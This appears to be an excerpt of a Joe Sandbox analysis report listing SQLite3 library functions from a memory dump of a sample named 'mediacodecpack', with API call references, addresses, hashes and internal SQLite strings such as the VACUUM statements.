                                                                                        • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                                        • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                                        • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                                        • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                                        • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                                        • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                                        • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                                        • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                                        • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                                        • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                                        • BEGIN;, xrefs: 609485DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                                        • API String ID: 632333372-52344843
                                                                                        • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                        • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                                        • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                        • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                                        APIs
                                                                                          • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                          • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                          • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                          • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                          • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                          • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                          • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                        • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                        • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                        • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                        • sqlite3_free.SQLITE3 ref: 60960618
                                                                                        • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                        • String ID: offsets
                                                                                        • API String ID: 463808202-2642679573
                                                                                        • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                        • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                        • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                        • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                        APIs
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                        • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                        • String ID:
                                                                                        • API String ID: 2903785150-0
                                                                                        • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                        • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                        • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                        • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_malloc
                                                                                        • String ID:
                                                                                        • API String ID: 423083942-0
                                                                                        • Opcode ID: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                        • Instruction ID: dba10035f3c017a022ff92dc0406edc4c972eb6647695f7afdbed5011b3e14eb
                                                                                        • Opcode Fuzzy Hash: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                        • Instruction Fuzzy Hash: 9112E3B4A15218CFCB18CF98D480A9EBBF6BF98304F24855AD855AB319D774EC42CF90
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                        • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                        • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                        • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                        • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                        • String ID:
                                                                                        • API String ID: 3556715608-0
                                                                                        • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                        • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                        • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                        • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                        APIs
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6095F645
                                                                                        • sqlite3_exec.SQLITE3 ref: 6095F686
                                                                                          • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                        • sqlite3_free_table.SQLITE3 ref: 6095F6A0
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 6095F6C7
                                                                                          • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                          • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                        • sqlite3_free.SQLITE3 ref: 6095F6B4
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        • sqlite3_free.SQLITE3 ref: 6095F6D4
                                                                                        • sqlite3_free.SQLITE3 ref: 6095F6ED
                                                                                        • sqlite3_free_table.SQLITE3 ref: 6095F6FF
                                                                                        • sqlite3_realloc.SQLITE3 ref: 6095F71B
                                                                                        • sqlite3_free_table.SQLITE3 ref: 6095F72D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_free_table$sqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_reallocsqlite3_vmprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1866449048-0
                                                                                        • Opcode ID: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                        • Instruction ID: 9ac78cbffd0e0cf27e5d0fdbf17c3a3d034f00011a14f89e76d08e502163788c
                                                                                        • Opcode Fuzzy Hash: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                        • Instruction Fuzzy Hash: 8751F1B49467099FDB01DF69D59178EBBF6FF68318F104429E884AB300D379D894CB91
                                                                                        APIs
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609407B4
                                                                                          • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                                                          • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609407C2
                                                                                          • Part of subcall function 6094064B: sqlite3_mutex_enter.SQLITE3 ref: 609406A7
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609407D0
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609407DE
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609407EC
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609407FA
                                                                                        • sqlite3_finalize.SQLITE3 ref: 60940808
                                                                                        • sqlite3_finalize.SQLITE3 ref: 60940816
                                                                                        • sqlite3_finalize.SQLITE3 ref: 60940824
                                                                                        • sqlite3_free.SQLITE3 ref: 6094082C
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_finalize$sqlite3_logsqlite3_mutex_enter$sqlite3_free
                                                                                        • String ID:
                                                                                        • API String ID: 14011187-0
                                                                                        • Opcode ID: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                                                        • Instruction ID: 14c977e837db455c9c1ce3b69ce7d4e0fb0da6313972e550a4586d0eb1b189ee
                                                                                        • Opcode Fuzzy Hash: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                                                        • Instruction Fuzzy Hash: F7116774504B008BCB50BF78C9C965877E9AFB5308F061978EC8A8F306EB34D4918B15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                        • API String ID: 0-780898
                                                                                        • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                        • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                        • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                        • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                                        • API String ID: 0-2604012851
                                                                                        • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                        • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                                        • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                        • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmp$sqlite3_logsqlite3_mutex_try
                                                                                        • String ID: 0$SQLite format 3
                                                                                        • API String ID: 3174206576-3388949527
                                                                                        • Opcode ID: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                        • Instruction ID: d3cc03899c2fb96d27ccc41cf7ad58ff30b38a29db2c3208110d6cb2c70dce50
                                                                                        • Opcode Fuzzy Hash: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                        • Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
                                                                                        APIs
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                                        • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                                        • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                          • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                          • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                                        • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                                        • String ID: |
                                                                                        • API String ID: 1576672187-2343686810
                                                                                        • Opcode ID: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                                                        • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                                        • Opcode Fuzzy Hash: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                                                        • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                                        APIs
                                                                                        • sqlite3_file_control.SQLITE3 ref: 609537BD
                                                                                        • sqlite3_free.SQLITE3 ref: 60953842
                                                                                        • sqlite3_free.SQLITE3 ref: 6095387C
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        • sqlite3_stricmp.SQLITE3 ref: 609538D4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_file_controlsqlite3_mutex_entersqlite3_stricmp
                                                                                        • String ID: 6$timeout
                                                                                        • API String ID: 2671017102-3660802998
                                                                                        • Opcode ID: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
                                                                                        • Instruction ID: da3e9078838fdf1f068eeacc94130b5fe058058c2a53432068b0843c8cdd1fdd
                                                                                        • Opcode Fuzzy Hash: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
                                                                                        • Instruction Fuzzy Hash: 6CA11270A083198BDB15CF6AC88079EBBF6BFA9304F10846DE8589B354D774D885CF41
                                                                                        APIs
                                                                                        • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                          • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                                        • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                                        • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                                        Strings
                                                                                        Memory Dump Source
